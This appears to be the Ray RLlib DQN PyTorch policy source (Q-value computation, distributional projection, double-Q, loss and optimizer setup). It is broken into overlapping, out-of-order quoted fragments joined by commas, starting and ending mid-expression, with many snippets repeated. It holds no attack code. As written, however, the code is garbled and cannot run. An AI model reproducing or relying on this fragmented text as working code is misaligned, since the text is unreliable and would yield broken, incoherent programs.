floor_equal_ceil) mu_delta = q_probs_tp1_best * (b - lb) ml_delta", "def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\":", "ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits)", "num_atoms) # (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta", "rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights", "loss to update td error attribute build_q_losses(self, self.model, None, input_dict)", "train_batch: SampleBatch) -> TensorType: config = policy.config # Q-network evaluation.", "device (this is done autoatically for the # policy.model, but", "= model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action,", "name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn,", "model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [],", "u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub -", "num_outputs = action_space.n # TODO(sven): Move option to add LayerNorm", "q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t", "get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy:", "not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is not", "action_space, config) # Move target net to device (this is", "ml_delta = q_probs_tp1_best * (ub - b + floor_equal_ceil) mu_delta", "for any other models the policy has). policy.target_q_model = policy.target_q_model.to(policy.device)", "= True else: num_outputs = action_space.n # TODO(sven): Move option", "= q_probs_tp1_best * (ub - b + floor_equal_ceil) mu_delta =", "torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin:", "explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n)", "into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def", "TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy:", "= compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net,", "if nn: F = nn.functional class QLoss: def __init__(self, q_t_selected,", "scores for actions which we know were selected in the", "lb < 0.5).float() # (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(),", "[] # state-out def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch)", "q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True)", "= softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats", "q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q", "compute estimate of best possible value starting from state at", "train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy:", "- 1) # (batch_size, 1) * (1, num_atoms) = (batch_size,", "True, is_training: bool = False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]:", "gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space,", "Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses,", "TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move", "is_training: bool = False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals", "(batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step *", "option to add LayerNorm after each Dense # generically into", "starting from state at t + 1 if config[\"double_q\"]: q_tp1_using_online_net,", "ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import", "logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) ->", "insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss =", "importance_weights) self.stats = { # TODO: better Q stats for", "or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs,", "1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best =", "= torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum(", "explore=False, is_training=True) # Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 =", "explore: bool = True, is_training: bool = False, **kwargs) ->", "_, train_batch: SampleBatch) -> TensorType: config = policy.config # Q-network", "import ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN,", "-> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy,", "\"is_training\": is_training, }, [], None) if config[\"num_atoms\"] > 1: (action_scores,", "from state at t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net,", "of bellman equation q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked", "policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2,", "Clip grads if configured. return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy:", "None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target net", "add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] ==", "-1), dim=1) m = ml_delta + mu_delta # Rainbow paper", "from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from", "# generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model,", "for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer the last", "q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical, [] # state-out", "ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target net to", "(TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch", "torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value", "supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer the", "policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection =", "from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE,", "[], None) if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits,", "q_vals = compute_q_values(policy, model, obs_batch, explore, is_training) q_vals = q_vals[0]", "(b-lb) == 0. floor_equal_ceil = (ub - lb < 0.5).float()", "**kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch,", "import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel", "def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) ->", "sigma0=config[\"sigma0\"], # TODO(sven): Move option to add LayerNorm after each", "policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t = compute_q_values( policy,", "num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"],", "None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space:", "= torch.range(0.0, num_atoms - 1, dtype=torch.float32) z = v_min +", "extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]: return", "mu_delta = q_probs_tp1_best * (b - lb) ml_delta = torch.sum(", "* (1, num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards,", "1) * (1, num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze(", "* torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta,", "1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 >", "self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution(", "config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy,", "is_training: bool = False): config = policy.config model_out, state =", "claims that using this cross entropy loss for # priority", "try to infer the last layer size, otherwise fall back", "the # policy.model, but not for any other models the", "model: ModelV2, obs: TensorType, explore, is_training: bool = False): config", "compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore, is_training: bool =", "otherwise fall back to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1]", "name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven):", "gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config)", "compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space, config:", "add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs,", "TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch from", "will # be discarded because (ub-b) == (b-lb) == 0.", "TensorType]: # Clip grads if configured. return apply_grad_clipping(policy, optimizer, loss)", "= (ub - lb < 0.5).float() # (batch_size, num_atoms, num_atoms)", "entropy loss z = torch.range(0.0, num_atoms - 1, dtype=torch.float32) z", "Q-learning which corresponds to an entropy loss z = torch.range(0.0,", "a*) will # be discarded because (ub-b) == (b-lb) ==", "num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub", "torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1", "= build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio,", "= torch.ceil(b) # Indispensable judgement which is missed in most", "clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float()", "(potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss = torch.mean(", "return policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy: Policy, model,", "policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:", "= q_probs_tp1_best * (b - lb) ml_delta = torch.sum( l_project", "1) # compute estimate of best possible value starting from", "action_scores - torch.unsqueeze( advantages_mean, 1) value = state_score + advantages_centered", "lb == ub, so pr_j(s', a*) will # be discarded", "else: num_outputs = action_space.n # TODO(sven): Move option to add", "F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub - b +", "obs_batch: TensorType, *, explore: bool = True, is_training: bool =", "train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for actions which we", "return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss:", "config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean =", "mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m =", "on loss to update td error attribute build_q_losses(self, self.model, None,", "float(num_atoms - 1)) lb = torch.floor(b) ub = torch.ceil(b) #", "generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2(", "be an integer, lb == ub, so pr_j(s', a*) will", "batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats)", "- lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1)", "v_max=10.0): if num_atoms > 1: # Distributional Q-learning which corresponds", "fall back to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"]", "\"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def", "torch.range(0.0, num_atoms - 1, dtype=torch.float32) z = v_min + z", "importance_weights # Do forward pass on loss to update td", "return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) ->", "= nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,", "to infer the last layer size, otherwise fall back to", "use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to add", "import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2", "q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection", "policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore, is_training:", "torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,", "to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True", "- q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats =", "# TODO(sven): Move option to add LayerNorm after each Dense", "state-out def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType:", "advantages_mean, 1) value = state_score + advantages_centered else: value =", "== 0. floor_equal_ceil = (ub - lb < 0.5).float() #", "is_training=True) q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best", "1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy,", "policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel,", "stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins,", "policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for actions", "= ml_delta + mu_delta # Rainbow paper claims that using", "# compute estimate of best possible value starting from state", "support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action =", "= self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS]", "= q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals", "rewards + gamma**n_step * q_tp1_best_masked # compute the error (potentially", "layer size, otherwise fall back to 256 num_outputs = ([256]", "support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action -", "value = action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy,", "action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"],", "UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch from", "policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict)", "def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy,", "LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from", "Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import", "1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss", "probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered =", "obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"],", "config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS],", "else q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical, [] #", "model, _, train_batch: SampleBatch) -> TensorType: config = policy.config #", "Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return", "config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config:", "optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) ->", "TrainerConfigDict torch, nn = try_import_torch() F = None if nn:", "+ config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n #", "be discarded because (ub-b) == (b-lb) == 0. floor_equal_ceil =", "dtype=torch.float32) z = v_min + z * (v_max - v_min)", "loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda", "q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"],", "cross entropy loss for # priority is robust and insensitive", "ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss,", "ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space,", "q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move", "def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]:", "def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]:", "the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum(", "torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta +", "policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device))", "= policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training,", "> 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else:", "1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action", "action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn,", "= rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] =", "((v_max - v_min) / float(num_atoms - 1)) lb = torch.floor(b)", "= policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\",", "# Q scores for actions which we know were selected", "build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer,", "compute the error (potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach()", "TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException(", "# (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size,", "self.td_error = q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() *", "v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to add LayerNorm after", "ModelV2, obs: TensorType, explore, is_training: bool = False): config =", "* (v_max - v_min) / float(num_atoms - 1) # (batch_size,", "lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta", "obs_space, action_space, config) # Move target net to device (this", "\\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net", "policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy,", "config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"],", "def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99,", "any other models the policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def", "dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action", "isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is not supported", "= torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta", "state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t >", "= F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub - b", "from typing import Dict, List, Tuple import gym import ray", "Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy)", "logits = support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores,", "apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist)", "done autoatically for the # policy.model, but not for any", "happens to be an integer, lb == ub, so pr_j(s',", "from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn = try_import_torch() F", "policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam(", "config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config:", "# policy.model, but not for any other models the policy", "q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target", "# compute the error (potentially clipped) self.td_error = q_t_selected -", "net to device (this is done autoatically for the #", "probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if", "{\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution,", "q_vals return policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy: Policy,", "QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"],", "support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax(", "TODO(sven): Move option to add LayerNorm after each Dense #", "FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum(", "TensorType, TrainerConfigDict torch, nn = try_import_torch() F = None if", "gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is not supported for", "torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1),", "ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import", "reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1) value", "def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore, is_training: bool", "so pr_j(s', a*) will # be discarded because (ub-b) ==", "obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward", "v_max) b = (r_tau - v_min) / ((v_max - v_min)", "Dense # generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\",", "Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from", "if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model,", "actions which we know were selected in the given state.", "error attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error =", "= ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze(", "Policy, input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]: return {\"q_values\":", "# state-out def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) ->", "TorchCategorical, [] # state-out def build_q_losses(policy: Policy, model, _, train_batch:", "import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise", "b = 